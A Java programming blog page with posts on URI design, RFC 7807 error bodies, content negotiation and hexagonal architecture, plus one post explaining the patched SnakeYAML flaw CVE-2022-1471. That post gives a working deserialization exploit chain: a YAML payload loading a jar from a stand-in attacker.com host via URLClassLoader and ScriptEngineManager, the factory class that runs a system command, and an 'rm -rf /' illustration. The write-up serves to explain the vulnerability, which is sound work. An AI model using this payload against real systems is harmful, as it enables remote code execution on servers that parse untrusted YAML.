mscharhag, Programming and Stuff;

A blog about programming and software development topics, mostly focused on Java technologies including Java EE, Spring and Grails.

  • Monday, 17 June, 2024

    URI design suggestions

    In this post, we will take a look at URI design for REST APIs. Please note that this is a very subjective topic. So you should take these as general suggestions rather than the definitive way to go.

    On the one hand, URI design is important because it is hard to change URIs later without breaking client code. So it is good to think about URI design before building an API.

    On the other hand, I think some people overemphasise the importance of URI design. You can easily spend a lot of time reading through endless web discussions about various details. Your goal is usually not to come up with the perfect URI design, but to build a pragmatic and consistent API that fulfils a specific business need.

    It is usually much more important to be consistent than to be perfect. So if you choose a certain style of URI design, you should use it consistently, otherwise you may annoy your API users.

    So here are some suggestions for better URI design.

    Avoid case sensitivity, use lower case letters

    Prefer /users/john instead of /Users/John.

    Note that according to RFC 3986 the URI scheme and the domain part are case-insensitive and should be normalised to lower-case. However, the rest of the URI is case-sensitive. So HTTPS://API.My-Company.com is the same as https://api.my-company.com. But http://api.my-company.com/USERS is not the same as http://api-my-company.com/users.

    To complicate matters further, certain pieces of technology may handle things differently. In short: There is no need for this extra complexity.

    Prefer hyphens over spaces and underscores

    You will probably need a way to separate multiple words within a URI. The most commonly used character for this is the hyphen (-).

    Spaces in URIs need to be encoded as %20. So /weather report becomes /weather%20report, which is difficult for humans to read.

    The underscore is another option, which is slightly less user friendly than the hyphen. The reason for this is simply that URIs are often underlined within text passages. This makes underscores difficult to distinguish from spaces.

    Use hyphens over camel case

    This is basically a corollary to the previous two points. If we want to remove case sensitivity, we cannot use camel case. So we need another way of separating words, which is to use the hyphen character. So /weatherReport becomes /weather-report.

    Avoid trailing slashes

    Use /cars instead of /cars/.

    Trailing slashes confuse people; there is no reason why /cars/ should be different from /cars. A trailing slash is easy to forget and can cause hard-to-find errors in routing and web server configurations.

    Avoid media types and file formats in URIs

    Use /users/123 instead of /users/123.json.

    The URI is used to describe a resource not a data format. A single resource can be provided in different representations (aka formats). With HTTP we should use Content negotiation to decide which resource representation should be returned by the server.

    URIs describe resources not operations

    With REST, we use URIs to identify resources (like users, posts, or the image with ID 1234). For operations (like getUsers or deleteImage) we use HTTP verbs.

    So we should use

    GET /users
    POST /posts
    DELETE /images/1234

    instead of

    POST /getUsers
    GET /createPost?title=..
    POST /images/1234/delete

    Be consistent with plural and singular in resource names

    In my opinion it does not matter whether you use /users/123 or /user/123 as long as you are consistent. However, the majority of people seem to prefer the plural version (/users/123).

    If you go with plural, you should be consistent and only use singular names for true singleton resources.

    A few examples:

    /users        collection of all users
    /users/123    single user with id 123 from the collection
    /author       singleton resource, not a collection, there is only one author

    Do not use query parameters to alter state

    Query parameters are useful for various things, such as filtering and sorting collections. However, you should not use them to alter resource state.

    Use the HTTP Verbs PUT, POST, DELETE or PATCH to alter resource state. If clients need to provide additional information use the request body.

    For example, if you want to change the name of user 123 to John use something like

    PUT /users/123
    Content-Type: application/json
    {
      "name": "John"
    }

    instead of

    PUT /users/123?name=john

    See POST vs PUT vs PATCH for more details.

    URIs are hierarchical

    URIs identify resources hierarchically. Sub-resources usually have a 1:n or 1:1 relationship with the parent resource.

    For example, suppose we have an application that allows users to join groups. Within groups, users can create and comment on posts. So a post belongs to exactly one group and a comment belongs to exactly one post. To represent this relationship, we can come up with the following URI hierarchy:

    /groups
    returns the collection of all available groups
    
    /groups/111
    returns details about a specific groups (here 111)
    
    /groups/111/posts
    returns the collection of posts for group 111
    
    /groups/111/postings/222
    returns details about post 222 in group 111
    
    /groups/111/postings/222/comments
    returns the comments for post 222 in group 111

    If there is no clear hierarchy, query parameters can be a good option.

    Suppose we want to provide a route planning service. To get a route from berlin to paris, we could use /route/berlin/paris. However, this implies that the destination (paris) is a sub-resource of the start location (berlin), which does not seem right.

    A better way is to use query parameters. For example:

    /route?from=berlin&to=paris
  • Tuesday, 6 June, 2023

    Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

    In this post we will take a closer look at SnakeYAML and CVE-2022-1471.

    SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.

    In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform remote code execution by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.

    I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.

    Parsing YAML files with SnakeYAML

    Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.

    Suppose we have the following YAML file named person.yml:

    person:
      firstname: john
      lastname: doe
      address:
        street: fooway 42
        city: baz town
    

    In our Java code we can parse this YAML file with SnakeYAML like this:

    Yaml yaml = new Yaml();
    FileInputStream fis = new FileInputStream("/path/to/person.yml");
    Map<String, Object> parsed = yaml.load(fis);
    
    Map<String, Object> person = (Map<String, Object>) parsed.get("person");
    person.get("firstname");  // "john"
    person.get("lastname");   // "doe"
    person.get("address");    // another map with keys "street" and "city"

    yaml.load(fis) returns a Map<String, Object> instance that we can navigate through to get the values defined in the YAML file.

    Mapping YAML content to objects

    Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.

    One way is to use the !! syntax to set a Java type within a YAML object:

    person:
      !!demo.Person
      firstname: john
      lastname: doe
      address:
        street: fooway 42
        city: baz town

    This tells SnakeYAML to map the contents of the person object to the demo.Person Java class, which looks like this:

    public class Person {
        private String firstname;
        private String lastname;
        private Address address; // has getter and setter for street and city
    
        // getter and setter
    }

    We can now parse the YAML file and get the person object with the mapped YAML values like this:

    Map<String, Object> parsed = yaml.load(fis);
    Person person = (Person) parsed.get("person");
    

    SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.

    For example, suppose we have the following simple Email value object:

    public class Email {
        private String value;
    
        public Email(String value) {
            this.value = value;
        }
    
        // getter
    }

    Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:

    person:
      firstname: john
      lastname: doe
      email: !!demo.Email [ john@doe.com ]

    Where is the security issue?

    What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.

    Assume for a moment that there is a RunSystemCommand class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:

    foo: !!bad.code.RunSystemCommand [ rm -rf / ]

    Which would run the rm -rf / system command right after it is instantiated by SnakeYAML.

    Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.

    However, there are some interesting classes available in the standard Java library, that can be used. A very promising combination is ScriptEngineManager together with URLClassLoader. We will now learn a bit more about these two classes before we integrate them into a YAML file.

    Loading remote code via URLClassLoader

    URLClassLoader is a Java ClassLoader that can load classes and resources from jar files located at a specified URL. We can create URLClassLoader like this:

    URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
    URLClassLoader classLoader = new URLClassLoader(urls);
    

    URLClassLoader takes an array of URLs as constructor parameter. Here we pass a single URL pointing to a jar file on a remote server controlled by the attacker. Our classLoader instance can now be used to load classes from the remote jar file.

    If you are curious about how to load a class from a Classloader and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.

    // load class foo.bar.BadCode using the classLoader
    Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");
    
    // create a new instance of foo.bar.BadCode using the default constructor
    Object instance = loadedClass.newInstance();
    
    // run the method runMaliciousCode() on our new instance
    Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
    runMaliciousCode.invoke(instance);
    

    Using ScriptEngineManager to run code for us

    ScriptEngineManager is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. ScriptEngineManager uses the Java Service Provider mechanism to discover and instantiate available ScriptEngineFactory classes.

    The ClassLoader used by ScriptEngineManager can be passed as a constructor parameter:

    URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
    URLClassLoader classLoader = new URLClassLoader(urls);
    new ScriptEngineManager(classLoader);

    Here, the newly created ScriptEngineManager will look for ScriptEngineFactory implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.

    But what content must be provided in the remote jar file?

    We start by creating a malicious implementation of ScriptEngineFactory:

    package foo.bar;
    
    public class BadScriptEngineFactory implements ScriptEngineFactory {
        @Override
        public String getEngineName() {
            try {
                Runtime.getRuntime().exec("calc");
            } catch (IOException e) {
                throw new RuntimeException(e);
            }
            return null;
        }
    
        // empty stubs for other interface methods
    }

    The first method that ScriptEngineManager calls after instantiating a ScriptEngineFactory is getEngineName(). So we use this method to execute our malicious code. In this example, we will simply run the calc system command, which will start the calculator on a Windows system. This is a simple proof, that we can run a system command from the provided jar file.

    As mentioned earlier, ScriptEngineManager uses the Java Service Provider mechanism to find classes that implement the ScriptEngineFactory interface.

    So we need to create a service provider configuration for our ScriptEngineFactory. We do this by creating a file called javax.script.ScriptEngineFactory in the META-INF/services directory. This file must contain the fully qualified name of our ScriptEngineFactory:

    foo.bar.BadScriptEngineFactory

    We then package the class and configuration file into a jar file called malicious-code.car. The final layout inside the jar file looks like this:

    • malicious-code.jar
      • META-INF
        • services
          • javax.script.ScriptEngineFactory
        • MANIFEST.MF
      • foo
        • bar
          • BadScriptEngineFactory.class

    We can now put this jar file on a server and make it available to the URLClassLoader used by the ScriptEngineManager.

    To recap the snippet shown earlier:

    URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
    URLClassLoader classLoader = new URLClassLoader(urls);
    new ScriptEngineManager(classLoader);

    ScriptEngineManager should now detect the BadScriptEngineFactory class within the malicious-code.jar file. Once instantiated, it calls the getEngineName() method, which executes the calc system command. So running this code on a Windows system should open the Windows Calculator.

    Constructing a malicious YAML file

    Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.

    So the final YAML file looks like this:

    person: !!javax.script.ScriptEngineManager [
        !!java.net.URLClassLoader [[
            !!java.net.URL [http://attacker.com/malicious-code.jar]
        ]]
    ]

    We create a simple person YAML object. For the value we use the !! syntax we saw earlier to create a ScriptEngineManager.

    As a constructor parameter we pass a URLClassLoader with a URL pointing to our malicious jar file. Notice that we open two square brackets after URLClassLoader. One to indicate that a constructor argument follows and a second to define an array.

    When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.

  • Monday, 15 August, 2022

    A standardized error format for HTTP responses

    HTTP uses status codes to indicate the result of the servers attempt to satisfy the request. In case the server is unable to process the request we can choose from a variety of HTTP error codes.

    Unfortunately status codes alone often do not provide enough information for API clients. For example, a server might respond with the status code 400 (Bad Request) to indicate the client sent an invalid request. Wouldn't it be nice if the response body would tell us what specific part of the request was invalid or how to resolve the problem?

    Status codes are used to define higher level error classes while error details are usually part of the response body. Many APIs use a custom error format for response bodies to provide additional problem information. However, there is also a standard that can help us here, defined in RFC 2707.

    RFC 7807 defines a data model for problem details in JSON and XML. Before coming up with a new generic fault or error response format for you API, it might be worth looking into RFC 7807. However, it is absolutely fine to use your own domain-specific format if this fits better to your application.

    RFC 7807: Problem Details for HTTP APIs

    A HTTP response using RFC 7807 might look like this:

    HTTP/1.1 400 Bad request
    Content-Type: application/problem+json
    Content-Language: en
    
    {
        "type": "https://api.my-cool-example.com/problems/required-field-missing",
        "title": "Required field is missing",
        "detail": "Article with id 1234 cannot be updated because the required field 'title' is missing",
        "status": 400,
        "instance": "/articles/1234",
        "field": "title"
    }
    

    As usual, the HTTP status code (400, Bad request) gives us a broad indication of the problem. Notice the response Content-Type of application/problem+json. This tells us the response contains a RFC 7807 compliant body. When using XML instead of JSON the Content-Type application/problem+xml is used.

    A problem details JSON response can have the following members:

    • type (string) - A URI reference that identifies the problem type.
    • title (string) - A short human-readable summary of the problem type. It should not change between multiple occurrences of the same problem type, except for purposes of localization.
    • status (number) - The HTTP status code generated by the origin server.
    • detail (string) - A human-readable description of this specific problem occurrence.
    • instance (string) - A URI that identifies the resource related to this specific problem occurrence.

    All fields are optional. However, you should at least provide a type value as this is used by consumers to identify the specific problem type. Consumers should not parse the title or detail fields.

    Problem types

    Problem types are used to identify specific problems. A problem type must document:

    • A type URI (that is used in the type field of the response).
    • A title that describes the problem (used in the title field of the response).
    • The HTTP status code it is used with.

    The type URI should resolve to a human-readable documentation of the problem (e.g. a HTML document). This URI should be under your control and stable over time.

    Problem types may also specify the use of a Retry-After response header if appropriate.

    RFC 7807 reserves one special URI as a problem type: about:blank. The problem type about:blank can be used if the problem has no additional semantics besides that of the HTTP status code. In this case, the title should be the same as the HTTP status phrase for that code (e.g. Bad Request for HTTP status 400).

    Extension members

    Problem types may extend the problem details object with additional members to provide additional information.

    The field member from the example response shown above is an example of such an extension member. It belongs to the required-field-missing problem type and indicates the missing field. A consumer might parse this member to construct an appropriate error message for the end-user.

    Conclusion

    HTTP status codes alone are often not enough to provide a meaningful problem description.

    RFC 7807 defines a standardized format for a more detailed problem descriptions within the body of an HTTP response. Before coming up with just another custom error response format, it might be a good idea to look at the RFC 7807 problem format.

  • Monday, 22 November, 2021

    HTTP - Content negotiation

    With HTTP, resources are identified using URIs. And a uniquely identified resource might support multiple resource representations. A representation is a specific form of a particular resource.

    For example:

    • a HTML page /index.html might be available in different languages
    • product data located at /products/123 can be served in JSON, XML or CSV
    • an avatar image /user/avatar might available in JPEG, PNG and GIF formats

    In all these cases one underlying resource has multiple different representations.

    Content negotiation is the mechanism used by clients and servers to decide which representation should be used.

    Server-driven and agent-driven content negotiation

    We can differentiate between server-driven and agent-driven content negotiation.

    With server-driven content negotiation the client tells the server which representations are preferable. The server then picks the representation that best fits the clients needs.

    When using agent-driven content negotiation the server tells the client which representations are available. The client then picks the best matching option.

    In practice nearly only server-driven negotiation is used. Unfortunately, there is no standardized format for doing agent-driven negotiation. Additionally, agent-driven negotiation is usually also worse for performance as it requires an additional request / response round trip. In the rest of this article we will therefore focus on server-driven negotiation.

    Accept headers

    With server-driven negotiation the client uses headers to indicate supported content formats. A server-side algorithm then uses these headers to decide which resource representation should be returned.

    Most commonly used is the Accept-Header, which communicates the media-type preferred by the client. For example, consider the following simple HTTP request containing an Accept header:

    GET /monthly-report
    Accept: text/html; q=1.0, text/*; q=0.8

    The header tells the server that the client understands HTML (media-type text/html) and other text based formats (mediatype text/*).

    text/* indicates that all subtypes of the text type are supported. To indicate that all media types are supported we can use */*.

    In this example HTML is preferred over other text based formats because it has a higher quality factor (q).

    Ideally a server would respond with a HTML document to this request. For example:

    HTTP/1.1 200 OK
    Content-Type: text/html
    
    <html>
        <body>
            <h1>Monthly report</h1>
            ...
        </body>
    </html>

    If returning HTML is not feasible, the server can also respond with another text based format, like text/plain:

    200 OK
    Content-Type: text/plain
    
    Monthly report
    Bla bli blu
    ...

    Besides the Accept header there are also the Accept-Language and Accept-Encoding headers, we can use. Accept-Language indicates the language preference of the client while Accept-Encoding defines the acceptable content encodings.

    Of course all these headers can be used together. For example:

    GET /monthly-report
    Accept: text/html
    Accept-Language: en-US; q=1.0, en; q=0.9, fr; q=0.4
    Accept-Encoding: gzip, br

    Here the client indicates that he prefers

    • an HTML document
    • US English (preferred, q=1.0) but other English variations are also fine (q=0.9). If English is not available, French can do the job too (q=0.4)
    • gzip and brotli (br) encoding is supported

    An acceptable response might look like this:

    200 Ok
    Content-Type: text/html
    Content-Language: en
    Content-Encoding: gzip
    
    <gzipped html document>

    What if the server cannot return an acceptable response?

    If the server is unable to fulfill the clients preferences the HTTP status code 406 (Not Acceptable) can be returned. This status code indicates that the server is unable to produce a response matching the clients preference.

    Depending on the situation it might also be viable to return a response that does not exactly match the clients preference. For example, assume no language provided in the Accept-Language header is supported by the server. In this case, it can still be a valid option to return a response using a predefined default language. This might be more useful for the client than nothing. In this case, the client can look at the Content-Language header of the response and decide if he wants to use the response or ignore it.

    Content negotiation in REST APIs

    For REST APIs it can be a viable option to support more than one standard representation for resources. For example, with content negotiation we can support JSON and XML and let the client decide what he wants to use.

    CSV can also be an interesting option to consider in certain situations as the response can directly be viewed with tools like Excel. For example, consider the following request:

    GET /users
    Accept: text/csv
    

    Instead of returning a JSON (or XML) collection, the server now can respond with a list of users in CSV format.

    HTTP/1.1 200 Ok
    Content-Type: text/csv
    
    Id;Username;Email
    1;john;john.doe@example.com
    2;anna91;anna91@example.com

     

    Interested in more REST related articles? Have a look at my REST API design page.

  • Monday, 1 November, 2021

    Avoid leaking domain logic

    Many software architectures try to separate domain logic from other parts of the application. To follow this practice we always need to know what actually is domain logic and what is not. Unfortunately this is not always that easy to separate. If we get this decision wrong, domain logic can easily leak into other components and layers.

    We will go through this problem by looking at examples using a hexagonal application architecture. If you are not familiar with hexagonal architecture (also called ports and adapters architecture) you might be interested in the previous post about the transition from a traditional layered architecture to a hexagonal architecture.

    Assume a shop system that publishes new orders to a messaging system (like Kafka). Our product owner now tells us that we have to listen for these order events and persist the corresponding order in the database.

    Using hexagonal architecture the integration with a messaging system is implemented within an adapter. So, we start with a simple adapter implementation that listens for Kafka events:

    @AllArgsConstructor
    public class KafkaAdapter {
        private final SaveOrderUseCase saveOrderUseCase;
    
        @KafkaListener(topic = ...)
        public void onNewOrderEvent(NewOrderKafkaEvent event) {
            Order order = event.getOrder();
            saveOrderUseCase.saveOrder(order);
        }
    }

    In case you are not familiar with the @AllArgsConstructor annotation from project lombok: It generates a constructor which accepts each field (here saveOrderUseCase) as parameter.

    The adapter delegates the saving of the order to a UseCase implementation.

    UseCases are part of our domain core and implements domain logic, together with the domain model. Our simple example UseCase looks like this:

    @AllArgsConstructor
    public class SaveOrderUseCase {
        private final SaveOrderPort saveOrderPort;
    
        public void saveOrder(Order order) {
            saveOrderPort.saveOrder(order);
        }
    }

    Nothing special here. We simply use an outgoing Port interface to persist the passed order.

    While the shown approach might work fine, we have a significant problem here: Our business logic has leaked into the Adapter implementation. Maybe you are wondering: what business logic?

    We have a simple business rule to implement: Everytime a new order is retrieved it should be persisted. In our current implementation this rule is implemented by the adapter while our business layer (the UseCase) only provides a generic save operation.

    Now assume, after some time, a new requirement arrives: Every time a new order is retrieved, a message should be written to an audit log.

    With our current implementation we cannot write the audit log message within SaveOrderUseCase. As the name suggests the UseCase is for saving an order and not for retrieving a new order and therefore might be used by other components. So, adding the audit log message here might have undesired side-effects.

    The solution is simple: We write the audit log message in our adapter:

    @AllArgsConstructor
    public class KafkaAdapter {
    
        private final SaveOrderUseCase saveOrderUseCase;
        private final AuditLog auditLog;
    
        @KafkaListener(topic = ...)
        public void onNewOrderEvent(NewOrderKafkaEvent event) {
            Order order = event.getOrder();
            saveOrderUseCase.saveOrder(order);
            auditLog.write("New order retrieved, id: " + order.getId());
        }
    }

    And now we have made it worse. Even more business logic has leaked into the adapter.

    If the auditLog object writes messages into a database, we might also have screwed up transaction handling, which is usually not handled in an incoming adapter.

    Using more specific domain operations

    The core problem here is the generic SaveOrderUseCase. Instead of providing a generic save operation to adapters we should provide a more specific UseCase implementation.

    For example, we can create a NewOrderRetrievedUseCase that accepts newly retrieved orders:

    @AllArgsConstructor
    public class NewOrderRetrievedUseCase {
        private final SaveOrderPort saveOrderPort;
        private final AuditLog auditLog;
    
        @Transactional
        public void onNewOrderRetrieved(Order newOrder) {
            saveOrderPort.saveOrder(order);
            auditLog.write("New order retrieved, id: " + order.getId());
        }
    }

    Now both business rules are implemented within the UseCase. Our adapter implementation is now simply responsible for mapping incoming data and passing it to the use case:

    @AllArgsConstructor
    public class KafkaAdapter {
        private final NewOrderRetrievedUseCase newOrderRetrievedUseCase;
    
        @KafkaListener(topic = ...)
        public void onNewOrderEvent(NewOrderKafkaEvent event) {
            NewOrder newOrder = event.toNewOrder();
            newOrderRetrievedUseCase.onNewOrderRetrieved(newOrder);
        }
    }

    This change only seems to be a small difference. However, for future requirements, we now have a specific location to handle incoming orders in our business layer. Otherwise, chances are high that with new requirements we leak more business logic into places where it should not be located.

    Leaks like this happen especially often with too generic create, save/update and delete operations in the domain layer. So, try to be very specific when implementing business operations.